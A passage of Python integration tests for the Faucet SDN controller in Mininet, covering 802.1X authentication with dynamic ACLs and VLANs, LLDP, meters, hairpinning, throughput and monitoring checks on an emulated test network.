{'AUTHENTICATION': {'port': 'port_2', 'eth_src': 'HOST2_MAC', 'status': 'success'}},
]
wpasupplicant_conf_1 = """
ap_scan=0
network={
key_mgmt=IEEE8021X
eap=MD5
identity="filter_id_user_accept"
password="accept_pass"
}
"""
wpasupplicant_conf_2 = """
ap_scan=0
network={
key_mgmt=IEEE8021X
eap=MD5
identity="filter_id_user_deny"
password="deny_pass"
}
"""
CONFIG_GLOBAL = """
vlans:
100:
description: "untagged"
acls:
accept_acl:
dot1x_assigned: True
rules:
- rule:
dl_type: 0x800 # Allow ICMP / IPv4
ip_proto: 1
actions:
allow: True
- rule:
dl_type: 0x0806 # ARP Packets
actions:
allow: True
deny_acl:
dot1x_assigned: True
rules:
- rule:
dl_type: 0x800 # Deny ICMP / IPv4
ip_proto: 1
actions:
allow: False
- rule:
dl_type: 0x0806 # ARP Packets
actions:
allow: True
"""
CONFIG = """
dot1x:
nfv_intf: NFV_INTF
nfv_sw_port: %(port_4)d
radius_ip: 127.0.0.1
radius_port: RADIUS_PORT
radius_secret: SECRET
interfaces:
%(port_1)d:
name: b1
description: "b1"
native_vlan: 100
# 802.1x client.
dot1x: True
dot1x_dyn_acl: True
%(port_2)d:
name: b2
description: "b2"
native_vlan: 100
# 802.1X client.
dot1x: True
dot1x_dyn_acl: True
%(port_3)d:
name: b3
description: "b3"
native_vlan: 100
# ping host.
%(port_4)d:
name: b4
description: "b4"
output_only: True
# "NFV host - interface used by controller."
"""
def test_untagged(self):
port_no1 = self.port_map['port_1']
port_no2 = self.port_map['port_2']
self.one_ipv4_ping(self.eapol1_host, self.ping_host.IP(),
require_host_learned=False, expected_result=False)
self.one_ipv4_ping(self.eapol2_host, self.ping_host.IP(),
require_host_learned=False, expected_result=False)
self.assertTrue(self.try_8021x(
self.eapol1_host, port_no1, self.wpasupplicant_conf_1, and_logoff=False))
self.assertTrue(self.try_8021x(
self.eapol2_host, port_no2, self.wpasupplicant_conf_2, and_logoff=False))
self.one_ipv4_ping(self.eapol1_host, self.ping_host.IP(),
require_host_learned=False, expected_result=True)
self.one_ipv4_ping(self.eapol2_host, self.ping_host.IP(),
require_host_learned=False, expected_result=False)
self.post_test_checks()
class Faucet8021XDynACLLogoutTest(Faucet8021XDynACLLoginTest):
DOT1X_EXPECTED_EVENTS = [
{'ENABLED': {}},
{'PORT_UP': {'port': 'port_1', 'port_type': 'supplicant'}},
{'PORT_UP': {'port': 'port_4', 'port_type': 'nfv'}},
{'AUTHENTICATION': {'port': 'port_1', 'eth_src': 'HOST1_MAC', 'status': 'success'}},
{'AUTHENTICATION': {'port': 'port_1', 'eth_src': 'HOST1_MAC', 'status': 'logoff'}}
]
def test_untagged(self):
port_no1 = self.port_map['port_1']
self.one_ipv4_ping(self.eapol1_host, self.ping_host.IP(),
require_host_learned=False, expected_result=False)
self.assertTrue(self.try_8021x(
self.eapol1_host, port_no1, self.wpasupplicant_conf_1, and_logoff=True))
self.one_ipv4_ping(self.eapol1_host, self.ping_host.IP(),
require_host_learned=False, expected_result=False)
self.post_test_checks()
class Faucet8021XVLANTest(Faucet8021XSuccessTest):
"""Test that two hosts are put into vlans.
Same VLAN, Logoff, diff VLANs, port flap."""
CONFIG_GLOBAL = """vlans:
100:
vid: 100
description: "untagged"
radiusassignedvlan1:
vid: %u
description: "untagged"
dot1x_assigned: True
radiusassignedvlan2:
vid: %u
description: "untagged"
dot1x_assigned: True
""" % (mininet_test_base.MAX_TEST_VID - 1,
mininet_test_base.MAX_TEST_VID)
CONFIG = """
dot1x:
nfv_intf: NFV_INTF
nfv_sw_port: %(port_4)d
radius_ip: 127.0.0.1
radius_port: RADIUS_PORT
radius_secret: SECRET
interfaces:
%(port_1)d:
native_vlan: 100
# 802.1x client.
dot1x: True
%(port_2)d:
native_vlan: 100
# 802.1X client.
dot1x: True
%(port_3)d:
native_vlan: radiusassignedvlan1
# ping host.
%(port_4)d:
output_only: True
# "NFV host - interface used by controller."
"""
RADIUS_PORT = 1940
DOT1X_EXPECTED_EVENTS = []
wpasupplicant_conf_1 = """
ap_scan=0
network={
key_mgmt=IEEE8021X
eap=MD5
identity="vlanuser1001"
password="password"
}
"""
wpasupplicant_conf_2 = """
ap_scan=0
network={
key_mgmt=IEEE8021X
eap=MD5
identity="vlanuser2222"
password="milliphone"
}
"""
def test_untagged(self):
vid = 100 ^ mininet_test_base.OFPVID_PRESENT
radius_vid1 = (mininet_test_base.MAX_TEST_VID - 1) ^ mininet_test_base.OFPVID_PRESENT
radius_vid2 = mininet_test_base.MAX_TEST_VID ^ mininet_test_base.OFPVID_PRESENT
port_no1 = self.port_map['port_1']
port_no2 = self.port_map['port_2']
port_no3 = self.port_map['port_3']
self.assertTrue(self.try_8021x(
self.eapol1_host, port_no1, self.wpasupplicant_conf_1, and_logoff=False))
self.wait_until_matching_flow(
{'in_port': port_no1},
table_id=self._VLAN_TABLE,
actions=['SET_FIELD: {vlan_vid:%u}' % radius_vid1])
self.wait_until_matching_flow(
{'vlan_vid': radius_vid1},
table_id=self._FLOOD_TABLE,
actions=['POP_VLAN', 'OUTPUT:%s' % port_no1, 'OUTPUT:%s' % port_no3])
self.wait_until_matching_flow(
{'vlan_vid': vid},
table_id=self._FLOOD_TABLE,
actions=['POP_VLAN', 'OUTPUT:%s' % port_no2])
self.wait_until_no_matching_flow(
{'vlan_vid': radius_vid2},
table_id=self._FLOOD_TABLE,
actions=['POP_VLAN', 'OUTPUT:%s' % port_no1, 'OUTPUT:%s' % port_no2])
self.one_ipv4_ping(
self.eapol1_host, self.ping_host.IP(),
require_host_learned=False, expected_result=True)
self.assertTrue(self.try_8021x(
self.eapol1_host, port_no1, self.wpasupplicant_conf_1, and_logoff=True))
self.one_ipv4_ping(
self.eapol1_host, self.ping_host.IP(),
require_host_learned=False, expected_result=False)
# check ports are back in the right vlans.
self.wait_until_no_matching_flow(
{'in_port': port_no1},
table_id=self._VLAN_TABLE,
actions=['SET_FIELD: {vlan_vid:%u}' % radius_vid1])
self.wait_until_matching_flow(
{'in_port': port_no1},
table_id=self._VLAN_TABLE,
actions=['SET_FIELD: {vlan_vid:%u}' % vid])
# check flood ports are in the right vlans
self.wait_until_no_matching_flow(
{'vlan_vid': radius_vid1},
table_id=self._FLOOD_TABLE,
actions=['POP_VLAN', 'OUTPUT:%s' % port_no1, 'OUTPUT:%s' % port_no3])
self.wait_until_matching_flow(
{'vlan_vid': vid},
table_id=self._FLOOD_TABLE,
actions=['POP_VLAN', 'OUTPUT:%s' % port_no1, 'OUTPUT:%s' % port_no2])
# check two 1x hosts play nicely. (same dyn vlan)
self.assertTrue(self.try_8021x(
self.eapol1_host, port_no1, self.wpasupplicant_conf_1, and_logoff=False))
self.one_ipv4_ping(
self.eapol1_host, self.ping_host.IP(),
require_host_learned=False, expected_result=True)
self.one_ipv4_ping(
self.eapol1_host, self.eapol2_host.IP(),
require_host_learned=False, expected_result=False)
self.assertTrue(self.try_8021x(
self.eapol2_host, port_no2, self.wpasupplicant_conf_1, and_logoff=False))
self.one_ipv4_ping(
self.eapol2_host, self.ping_host.IP(),
require_host_learned=False, expected_result=True)
self.one_ipv4_ping(
self.eapol2_host, self.eapol1_host.IP(),
require_host_learned=False, expected_result=True)
# check two 1x hosts dont play (diff dyn vlan).
self.assertTrue(self.try_8021x(
self.eapol2_host, port_no2, self.wpasupplicant_conf_2, and_logoff=False))
self.one_ipv4_ping(
self.eapol2_host, self.ping_host.IP(),
require_host_learned=False, expected_result=False)
self.one_ipv4_ping(
self.eapol2_host, self.eapol1_host.IP(),
require_host_learned=False, expected_result=False)
# move host1 to new VLAN
self.assertTrue(self.try_8021x(
self.eapol1_host, port_no1, self.wpasupplicant_conf_2, and_logoff=False))
self.one_ipv4_ping(
self.eapol1_host, self.ping_host.IP(),
require_host_learned=False, expected_result=False)
self.one_ipv4_ping(
self.eapol1_host, self.eapol2_host.IP(),
require_host_learned=False, expected_result=True)
self.wait_until_matching_flow(
{'eth_src': self.eapol1_host.MAC(), 'vlan_vid': radius_vid2},
table_id=self._ETH_SRC_TABLE)
self.wait_until_matching_flow(
{'eth_src': self.eapol1_host.MAC(), 'vlan_vid': radius_vid2},
table_id=self._ETH_SRC_TABLE)
self.wait_until_no_matching_flow(
{'eth_src': self.eapol1_host.MAC(), 'vlan_vid': vid},
table_id=self._ETH_SRC_TABLE)
self.wait_until_no_matching_flow(
{'eth_src': self.eapol1_host.MAC(), 'vlan_vid': radius_vid1},
table_id=self._ETH_SRC_TABLE)
self.wait_until_no_matching_flow(
{'eth_dst': self.eapol1_host.MAC(), 'vlan_vid': vid},
table_id=self._ETH_DST_TABLE)
self.wait_until_no_matching_flow(
{'eth_dst': self.eapol1_host.MAC(), 'vlan_vid': radius_vid1},
table_id=self._ETH_DST_TABLE)
# test port up/down. removes the dynamic vlan & host cache.
self.flap_port(port_no2)
self.wait_until_matching_flow(
{'in_port': port_no2},
table_id=self._VLAN_TABLE,
actions=['SET_FIELD: {vlan_vid:%u}' % vid])
self.wait_until_matching_flow(
{'vlan_vid': vid},
table_id=self._FLOOD_TABLE,
actions=['POP_VLAN', 'OUTPUT:%s' % port_no2])
self.wait_until_no_matching_flow(
{'in_port': port_no2},
table_id=self._VLAN_TABLE,
actions=['SET_FIELD: {vlan_vid:%u}' % radius_vid2])
self.wait_until_no_matching_flow(
{'vlan_vid': radius_vid2},
table_id=self._FLOOD_TABLE,
actions=['POP_VLAN', 'OUTPUT:%s' % port_no1, 'OUTPUT:%s' % port_no2])
self.wait_until_no_matching_flow(
{'eth_src': self.eapol2_host.MAC()},
table_id=self._ETH_SRC_TABLE)
self.wait_until_no_matching_flow(
{'eth_dst': self.eapol2_host.MAC(), 'vlan_vid': radius_vid1},
table_id=self._ETH_DST_TABLE,
actions=['POP_VLAN', 'OUTPUT:%s' % port_no2])
self.post_test_checks()
class FaucetUntaggedRandomVidTest(FaucetUntaggedTest):
CONFIG_GLOBAL = """
vlans:
randvlan:
vid: 100
description: "untagged"
"""
CONFIG = """
interfaces:
%(port_1)d:
native_vlan: randvlan
%(port_2)d:
native_vlan: randvlan
%(port_3)d:
native_vlan: randvlan
%(port_4)d:
native_vlan: randvlan
"""
def test_untagged(self):
last_vid = None
for _ in range(5):
vid = random.randint(2, mininet_test_base.MAX_TEST_VID)
if vid == last_vid:
continue
self.change_vlan_config(
'randvlan', 'vid', vid, cold_start=True, hup=True)
self.ping_all_when_learned()
last_vid = vid
class FaucetUntaggedNoCombinatorialFloodTest(FaucetUntaggedTest):
CONFIG = """
combinatorial_port_flood: False
""" + CONFIG_BOILER_UNTAGGED
class FaucetUntaggedControllerNfvTest(FaucetUntaggedTest):
def test_untagged(self):
# Name of switch interface connected to last host,
# accessible to controller
last_host = self.hosts_name_ordered()[-1]
switch = self.first_switch()
last_host_switch_link = switch.connectionsTo(last_host)[0]
last_host_switch_intf = [intf for intf in last_host_switch_link if intf in switch.intfList()][0]
super().test_untagged()
# Confirm controller can see switch interface with traffic.
ifconfig_output = self.net.controllers[0].cmd('ifconfig %s' % last_host_switch_intf)
self.assertTrue(
re.search('(R|T)X packets[: ][1-9]', ifconfig_output),
msg=ifconfig_output)
class FaucetUntaggedBroadcastTest(FaucetUntaggedTest):
def test_untagged(self):
super().test_untagged()
self.verify_broadcast()
self.verify_no_bcast_to_self()
self.verify_unicast_not_looped()
class FaucetUntaggedNSLoopTest(FaucetUntaggedTest):
CONFIG_GLOBAL = """
acls:
nsonly:
- rule:
dl_type: %u
ip_proto: 58
icmpv6_type: 135
actions:
allow: 1
- rule:
actions:
allow: 0
vlans:
100:
description: "untagged"
""" % IPV6_ETH
CONFIG = """
interfaces:
%(port_1)d:
native_vlan: 100
acl_in: nsonly
%(port_2)d:
native_vlan: 100
acl_in: nsonly
%(port_3)d:
native_vlan: 100
acl_in: nsonly
%(port_4)d:
native_vlan: 100
acl_in: nsonly
"""
def test_untagged(self):
self.verify_no_bcast_to_self()
class FaucetUntaggedNoCombinatorialBroadcastTest(FaucetUntaggedBroadcastTest):
CONFIG = """
combinatorial_port_flood: False
""" + CONFIG_BOILER_UNTAGGED
class FaucetUntaggedLogRotateTest(FaucetUntaggedTest):
def test_untagged(self):
faucet_log = self.env[self.faucet_controllers[0].name]['FAUCET_LOG']
self.assertTrue(os.path.exists(faucet_log))
os.rename(faucet_log, faucet_log + '.old')
self.assertTrue(os.path.exists(faucet_log + '.old'))
self.flap_all_switch_ports()
self.assertTrue(os.path.exists(faucet_log))
class FaucetUntaggedLLDPTest(FaucetUntaggedTest):
CONFIG = """
lldp_beacon:
send_interval: 5
max_per_interval: 5
interfaces:
%(port_1)d:
native_vlan: 100
lldp_beacon:
enable: True
system_name: "faucet"
port_descr: "first_port"
org_tlvs:
- {oui: 0x12bb, subtype: 2, info: "01406500"}
%(port_2)d:
native_vlan: 100
%(port_3)d:
native_vlan: 100
%(port_4)d:
native_vlan: 100
"""
@staticmethod
def wireshark_payload_format(payload_str):
formatted_payload_str = ''
groupsize = 4
for payload_offset in range(len(payload_str) // groupsize):
char_count = payload_offset * 2
if char_count % 0x10 == 0:
formatted_payload_str += '0x%4.4x: ' % char_count
payload_fragment = payload_str[payload_offset * groupsize:][:groupsize]
formatted_payload_str += ' ' + payload_fragment
return formatted_payload_str
def test_untagged(self):
first_host = self.hosts_name_ordered()[0]
tcpdump_filter = 'ether proto 0x88cc'
timeout = 5 * 3
tcpdump_txt = self.tcpdump_helper(
first_host, tcpdump_filter, [
lambda: first_host.cmd('sleep %u' % timeout)],
timeout=timeout, vflags='-vv', packets=1)
oui_prefix = ''.join(self.FAUCET_MAC.split(':')[:3])
faucet_lldp_dp_id_attr = '%2.2x' % 1
expected_lldp_dp_id = ''.join((
oui_prefix,
faucet_lldp_dp_id_attr,
binascii.hexlify(str(self.dpid).encode('UTF-8')).decode()))
for lldp_required in (
r'%s > 01:80:c2:00:00:0e, ethertype LLDP' % self.FAUCET_MAC,
r'Application type \[voice\] \(0x01\), Flags \[Tagged\]Vlan id 50',
r'System Name TLV \(5\), length 6: faucet',
r'Port Description TLV \(4\), length 10: first_port',
self.wireshark_payload_format(expected_lldp_dp_id)):
self.assertTrue(
re.search(lldp_required, tcpdump_txt),
msg='%s: %s' % (lldp_required, tcpdump_txt))
class FaucetLLDPIntervalTest(FaucetUntaggedTest):
NUM_FAUCET_CONTROLLERS = 1
CONFIG = """
lldp_beacon:
send_interval: 10
max_per_interval: 5
interfaces:
%(port_1)d:
native_vlan: 100
lldp_beacon:
enable: True
system_name: "faucet"
port_descr: "first_port"
org_tlvs:
- {oui: 0x12bb, subtype: 2, info: "01406500"}
%(port_2)d:
native_vlan: 100
%(port_3)d:
native_vlan: 100
%(port_4)d:
native_vlan: 100
"""
def test_untagged(self):
first_host = self.hosts_name_ordered()[0]
tcpdump_filter = 'ether proto 0x88cc'
interval = 10
timeout = interval * 3
tcpdump_txt = self.tcpdump_helper(
first_host, tcpdump_filter, [
lambda: first_host.cmd('sleep %u' % timeout)],
# output epoch secs
timeout=timeout, vflags='-tt', packets=2)
timestamps = re.findall(r'(\d+)\.\d+ [0-9a-f:]+ \> [0-9a-f:]+', tcpdump_txt)
timestamps = [int(timestamp) for timestamp in timestamps]
self.assertTrue(timestamps[1] - timestamps[0] >= interval, msg=tcpdump_txt)
class FaucetUntaggedLLDPDefaultFallbackTest(FaucetUntaggedTest):
CONFIG = """
lldp_beacon:
send_interval: 5
max_per_interval: 5
interfaces:
%(port_1)d:
native_vlan: 100
lldp_beacon:
enable: True
org_tlvs:
- {oui: 0x12bb, subtype: 2, info: "01406500"}
"""
def test_untagged(self):
first_host = self.hosts_name_ordered()[0]
tcpdump_filter = 'ether proto 0x88cc'
timeout = 5 * 3
tcpdump_txt = self.tcpdump_helper(
first_host, tcpdump_filter, [
lambda: first_host.cmd('sleep %u' % timeout)],
timeout=timeout, vflags='-vv', packets=1)
for lldp_required in (
r'%s > 01:80:c2:00:00:0e, ethertype LLDP' % self.FAUCET_MAC,
r'Application type \[voice\] \(0x01\), Flags \[Tagged\]Vlan id 50',
r'System Name TLV \(5\), length 8: faucet-1',
r'Port Description TLV \(4\), length [1-9]: b%u' % self.port_map['port_1']):
self.assertTrue(
re.search(lldp_required, tcpdump_txt),
msg='%s: %s' % (lldp_required, tcpdump_txt))
class FaucetUntaggedMeterParseTest(FaucetUntaggedTest):
REQUIRES_METERS = True
OVS_TYPE = 'user'
CONFIG_GLOBAL = """
meters:
lossymeter:
meter_id: 1
entry:
flags: "KBPS"
bands:
[
{
type: "DROP",
rate: 100
}
]
acls:
lossyacl:
- rule:
actions:
meter: lossymeter
allow: 1
vlans:
100:
description: "untagged"
"""
def get_gauge_watcher_config(self):
return """
port_stats:
dps: ['%s']
type: 'port_stats'
interval: 5
db: 'stats_file'
port_state:
dps: ['%s']
type: 'port_state'
interval: 5
db: 'state_file'
meter_stats:
dps: ['%s']
type: 'meter_stats'
interval: 5
db: 'meter_file'
meter_stats_prom:
dps: ['%s']
type: 'meter_stats'
db: 'prometheus'
interval: 5
""" % (self.DP_NAME, self.DP_NAME, self.DP_NAME, self.DP_NAME)
GAUGE_CONFIG_DBS = """
prometheus:
type: 'prometheus'
prometheus_addr: '::1'
prometheus_port: %(gauge_prom_port)d
"""
config_ports = {'gauge_prom_port': None}
def _get_gauge_meter_config(self, faucet_config_file,
monitor_stats_file,
monitor_state_file,
monitor_meter_stats_file):
"""Build Gauge Meter config."""
return """
faucet_configs:
- %s
watchers:
%s
dbs:
stats_file:
type: 'text'
file: %s
state_file:
type: 'text'
file: %s
meter_file:
type: 'text'
file: %s
%s
""" % (faucet_config_file, self.get_gauge_watcher_config(),
monitor_stats_file, monitor_state_file, monitor_meter_stats_file,
self.GAUGE_CONFIG_DBS)
def _init_gauge_config(self):
gauge_config = self._get_gauge_meter_config(
self.faucet_config_path,
self.monitor_stats_file,
self.monitor_state_file,
self.monitor_meter_stats_file)
if self.config_ports:
gauge_config = gauge_config % self.config_ports
self._write_yaml_conf(self.gauge_config_path, yaml_load(gauge_config))
def test_untagged(self):
"""All hosts on the same untagged VLAN should have connectivity."""
# TODO: userspace DP port status not reliable.
self.ping_all_when_learned()
class FaucetUntaggedApplyMeterTest(FaucetUntaggedMeterParseTest):
CONFIG = """
interfaces:
%(port_1)d:
acl_in: lossyacl
native_vlan: 100
%(port_2)d:
native_vlan: 100
%(port_3)d:
native_vlan: 100
%(port_4)d:
native_vlan: 100
"""
def test_untagged(self):
super().test_untagged()
first_host, second_host = self.hosts_name_ordered()[:2]
error('metered ping flood: %s' % first_host.cmd(
'ping -c 1000 -f %s' % second_host.IP()))
# Require meter band bytes to match.
self.wait_until_matching_lines_from_file(
r'.+faucet-1-1-byte-band-count.+[1-9].+',
self.monitor_meter_stats_file)
meter_labels = {
'dp_id': self.dpid,
'dp_name': self.DP_NAME,
'meter_id': 1
}
byte_band_count = self.scrape_prometheus_var(
'of_meter_byte_band_count', labels=meter_labels, controller=self.gauge_controller.name)
self.assertTrue(byte_band_count)
class FaucetUntaggedMeterAddTest(FaucetUntaggedMeterParseTest):
NUM_FAUCET_CONTROLLERS = 1
def test_untagged(self):
super().test_untagged()
conf = self._get_faucet_conf()
conf['meters']['lossymeter2'] = {
'meter_id': 2,
'entry': {
'flags': ['PKTPS'],
'bands': [{'rate': '1000', 'type': 'DROP'}]
},
}
conf['acls']['lossyacl2'] = [{
'rule': {
'actions': {
'allow': 1,
'meter': 'lossymeter2'
}
}
}]
port_conf = conf['dps'][self.DP_NAME]['interfaces'][self.port_map['port_2']]
port_conf['acls_in'] = ['lossyacl2']
self.reload_conf(
conf, self.faucet_config_path,
restart=True, cold_start=True, change_expected=True, hup=True)
self.wait_until_matching_lines_from_file(
r'.+\'meter_id\'\: 2+',
self.get_matching_meters_on_dpid(self.dpid))
port_conf['acls_in'] = []
self.reload_conf(
conf, self.faucet_config_path,
restart=True, cold_start=True, change_expected=True)
self.wait_until_no_matching_lines_from_file(
r'.+\'meter_id\'\: 2+',
self.get_matching_meters_on_dpid(self.dpid))
class FaucetUntaggedMeterModTest(FaucetUntaggedMeterParseTest):
def test_untagged(self):
super().test_untagged()
conf = self._get_faucet_conf()
conf['dps'][self.DP_NAME]['interfaces'][self.port_map['port_1']]['acls_in'] = ['lossyacl']
self.reload_conf(
conf, self.faucet_config_path,
restart=True, cold_start=True, change_expected=True, hup=True)
self.wait_until_matching_lines_from_file(
r'.+KBPS+',
self.get_matching_meters_on_dpid(self.dpid))
conf['meters']['lossymeter']['entry']['flags'] = ['PKTPS']
self.reload_conf(
conf, self.faucet_config_path,
restart=True, cold_start=False, change_expected=True, hup=True)
self.wait_until_matching_lines_from_file(
r'.+PKTPS+',
self.get_matching_meters_on_dpid(self.dpid))
class FaucetUntaggedHairpinTest(FaucetUntaggedTest):
NETNS = True
CONFIG = """
interfaces:
%(port_1)d:
hairpin: True
native_vlan: 100
%(port_2)d:
native_vlan: 100
%(port_3)d:
native_vlan: 100
%(port_4)d:
native_vlan: 100
"""
def test_untagged(self):
# Create macvlan interfaces, with one in a separate namespace,
# to force traffic between them to be hairpinned via FAUCET.
first_host, second_host = self.hosts_name_ordered()[:2]
macvlan1_intf = 'macvlan1'
macvlan1_ipv4 = '10.0.0.100'
macvlan2_intf = 'macvlan2'
macvlan2_ipv4 = '10.0.0.101'
self.add_macvlan(first_host, macvlan1_intf, ipa=macvlan1_ipv4, mode='vepa')
self.add_macvlan(first_host, macvlan2_intf, mode='vepa')
macvlan2_mac = self.get_host_intf_mac(first_host, macvlan2_intf)
netns = self.hostns(first_host)
setup_cmds = []
setup_cmds.extend(
['ip link set %s netns %s' % (macvlan2_intf, netns)])
for exec_cmd in (
('ip address add %s/24 brd + dev %s' % (
macvlan2_ipv4, macvlan2_intf),
'ip link set %s up' % macvlan2_intf)):
setup_cmds.append('ip netns exec %s %s' % (netns, exec_cmd))
self.quiet_commands(first_host, setup_cmds)
self.one_ipv4_ping(first_host, macvlan2_ipv4, intf=macvlan1_intf)
self.one_ipv4_ping(first_host, second_host.IP())
# Verify OUTPUT:IN_PORT flood rules are exercised.
self.wait_nonzero_packet_count_flow(
{'in_port': self.port_map['port_1'],
'dl_dst': 'ff:ff:ff:ff:ff:ff'},
table_id=self._FLOOD_TABLE, actions=['OUTPUT:IN_PORT'])
self.wait_nonzero_packet_count_flow(
{'in_port': self.port_map['port_1'],
'dl_dst': macvlan2_mac},
table_id=self._ETH_DST_HAIRPIN_TABLE, actions=['OUTPUT:IN_PORT'])
class FaucetUntaggedGroupHairpinTest(FaucetUntaggedHairpinTest):
CONFIG = """
group_table: True
interfaces:
%(port_1)d:
hairpin: True
native_vlan: 100
%(port_2)d:
native_vlan: 100
%(port_3)d:
native_vlan: 100
%(port_4)d:
native_vlan: 100
"""
class FaucetUntaggedTcpIPv4IperfTest(FaucetUntaggedTest):
def test_untagged(self):
first_host, second_host = self.hosts_name_ordered()[:2]
first_host_ip = ipaddress.ip_address(first_host.IP())
second_host_ip = ipaddress.ip_address(second_host.IP())
for _ in range(3):
self.ping_all_when_learned()
self.verify_iperf_min(
((first_host, self.port_map['port_1']),
(second_host, self.port_map['port_2'])),
MIN_MBPS, first_host_ip, second_host_ip,
sync_counters_func=lambda: self.one_ipv4_ping(first_host, second_host_ip))
self.flap_all_switch_ports()
class FaucetUntaggedTcpIPv6IperfTest(FaucetUntaggedTest):
def test_untagged(self):
first_host, second_host = self.hosts_name_ordered()[:2]
first_host_ip = ipaddress.ip_interface('fc00::1:1/112')
second_host_ip = ipaddress.ip_interface('fc00::1:2/112')
self.add_host_ipv6_address(first_host, first_host_ip)
self.add_host_ipv6_address(second_host, second_host_ip)
for _ in range(3):
self.ping_all_when_learned()
self.verify_iperf_min(
((first_host, self.port_map['port_1']),
(second_host, self.port_map['port_2'])),
MIN_MBPS, first_host_ip.ip, second_host_ip.ip,
sync_counters_func=lambda: self.one_ipv6_ping(first_host, second_host_ip.ip))
self.flap_all_switch_ports()
class FaucetSanityTest(FaucetUntaggedTest):
"""Sanity test - make sure test environment is correct before running all tess."""
def test_scapy_fuzz(self):
# Scapy 2.4.5 has issues with 'fuzz' generation
# so black-list that version with a test
# https://github.com/secdev/scapy/issues/3306
# TODO: fix expected in next scapy release, > 2.4.5.
exception = False
try:
scapy.all.send(scapy.all.fuzz(scapy.all.Ether())) # pylint: disable=no-member
except Exception as e: # pylint: disable=broad-except
error('%s:' % self._test_name(), e)
exception = True
self.assertFalse(exception, 'Scapy threw an exception in send(fuzz())')
def test_ryu_config(self):
varstr = ', '.join(self.scrape_prometheus(var='ryu_config'))
self.assertTrue('echo_request_interval"} 10.0' in varstr)
self.assertTrue('maximum_unreplied_echo_requests"} 5.0' in varstr)
def verify_dp_port_healthy(self, dp_port, retries=5, min_mbps=MIN_MBPS):
for _ in range(retries):
port_desc = self.get_port_desc_from_dpid(self.dpid, dp_port)
port_name = port_desc['name']
port_state = port_desc['state']
port_config = port_desc['config']
port_speed_mbps = (port_desc['curr_speed'] * 1e3) / 1e6
error('DP %u is %s, at %u mbps\n' % (dp_port, port_name, port_speed_mbps))
if port_speed_mbps < min_mbps:
error('port speed %u below minimum %u mbps\n' % (
port_speed_mbps, min_mbps))
elif port_config != 0:
error('port config %u must be 0 (all clear)' % port_config)
elif port_state not in (0, 4):
error('state %u must be 0 (all flags clear or live)\n' % (
port_state))
else:
return
time.sleep(1)
self.fail('DP port %u not healthy (%s)' % (dp_port, port_desc))
def test_portmap(self):
prom_desc = self.scrape_prometheus(var='of_dp_desc_stats')
self.assertIsNotNone(prom_desc, msg='Cannot scrape of_dp_desc_stats')
error('DP: %s\n' % prom_desc[0])
error('port_map: %s\n' % self.port_map)
for i, host in enumerate(self.hosts_name_ordered(), start=1):
in_port = 'port_%u' % i
dp_port = self.port_map[in_port]
if dp_port in self.switch_map:
error('verifying cabling for %s: host %s -> dp %u\n' % (
in_port, self.switch_map[dp_port], dp_port))
else:
error('verifying host %s -> dp %s\n' % (
in_port, dp_port))
self.verify_dp_port_healthy(dp_port)
self.require_host_learned(host, in_port=dp_port)
learned = self.prom_macs_learned()
self.assertEqual(
len(self.hosts_name_ordered()), len(learned),
msg='test requires exactly %u hosts learned (got %s)' % (
len(self.hosts_name_ordered()), learned))
def test_listening(self):
msg_template = (
'Processes listening on test, or all interfaces may interfere with tests. '
'Please deconfigure them (e.g. configure interface as "unmanaged"):\n\n%s')
controller = self._get_controller()
ss_out = controller.cmd('ss -lnep').splitlines()
listening_all_re = re.compile(r'^.+\s+(\*:\d+|:::\d+)\s+(:+\*|\*:\*).+$')
listening_all = [line for line in ss_out if listening_all_re.match(line)]
for test_intf in list(self.switch_map.values()):
int_re = re.compile(r'^.+\b%s\b.+$' % test_intf)
listening_int = [line for line in ss_out if int_re.match(line)]
self.assertFalse(
len(listening_int),
msg=(msg_template % '\n'.join(listening_int)))
if listening_all:
print('Warning: %s' % (msg_template % '\n'.join(listening_all)))
def test_silence(self):
# Make all test hosts silent and ensure we hear no other packets.
for host in self.hosts_name_ordered():
self.host_drop_all_ips(host)
host.cmd('echo 1 > /proc/sys/net/ipv6/conf/%s/disable_ipv6' % host.defaultIntf())
for host in self.hosts_name_ordered():
tcpdump_filter = ''
tcpdump_txt = self.tcpdump_helper(
host, tcpdump_filter, [], timeout=10, vflags='-vv', packets=1)
self.tcpdump_rx_packets(tcpdump_txt, 0)
self.assertTrue(
self.tcpdump_rx_packets(tcpdump_txt, 0),
msg='got unexpected packet from test switch: %s' % tcpdump_txt)
class FaucetUntaggedPrometheusGaugeTest(FaucetUntaggedTest):
"""Testing Gauge Prometheus"""
GAUGE_CONFIG_DBS = """
prometheus:
type: 'prometheus'
prometheus_addr: '::1'
prometheus_port: %(gauge_prom_port)d
"""
config_ports = {'gauge_prom_port': None}
def get_gauge_watcher_config(self):
return """
port_stats:
dps: ['%s']
type: 'port_stats'
interval: 5
db: 'prometheus'
port_state:
dps: ['%s']
type: 'port_state'
interval: 5
db: 'prometheus'
flow_table:
dps: ['%s']
type: 'flow_table'
interval: 5
db: 'prometheus'
""" % (self.DP_NAME, self.DP_NAME, self.DP_NAME)
def _start_gauge_check(self):
if not self.gauge_controller.listen_port(self.config_ports['gauge_prom_port']):
return 'gauge not listening on prometheus port'
return None
def test_untagged(self):
self.wait_dp_status(1, controller=self.gauge_controller.name)
self.assertIsNotNone(self.scrape_prometheus_var(
'faucet_pbr_version', any_labels=True, controller=self.gauge_controller.name, retries=3))
conf = self._get_faucet_conf()
cookie = conf['dps'][self.DP_NAME]['cookie']
if not self.wait_ports_updating(self.port_map.keys(), self.PORT_VARS):
self.fail(msg='Gauge Prometheus port counters not increasing')
for _ in range(self.DB_TIMEOUT * 3):
updated_counters = True
for host in self.hosts_name_ordered():
host_labels = {
'dp_id': self.dpid,
'dp_name': self.DP_NAME,
'cookie': cookie,
'eth_dst': host.MAC(),
'inst_count': str(1),
'table_id': str(self._ETH_DST_TABLE),
'vlan': str(100),
'vlan_vid': str(4196)
}
packet_count = self.scrape_prometheus_var(
'flow_packet_count_eth_dst', labels=host_labels, controller=self.gauge_controller.name)
byte_count = self.scrape_prometheus_var(
'flow_byte_count_eth_dst', labels=host_labels, controller=self.gauge_controller.name)
if packet_count is None or packet_count == 0:
updated_counters = False
if byte_count is None or byte_count == 0:
updated_counters = False
if updated_counters:
return
time.sleep(1)
self.fail(msg='Gauge Prometheus flow counters not increasing')
class FaucetUntaggedInfluxTest(FaucetUntaggedTest):
"""Basic untagged VLAN test with Influx."""
GAUGE_CONFIG_DBS = """
influx:
type: 'influx'
influx_db: 'faucet'
influx_host: '127.0.0.1'
influx_port: %(gauge_influx_port)d
influx_user: 'faucet'
influx_pwd: ''
influx_retries: 1
""" + """
influx_timeout: %u
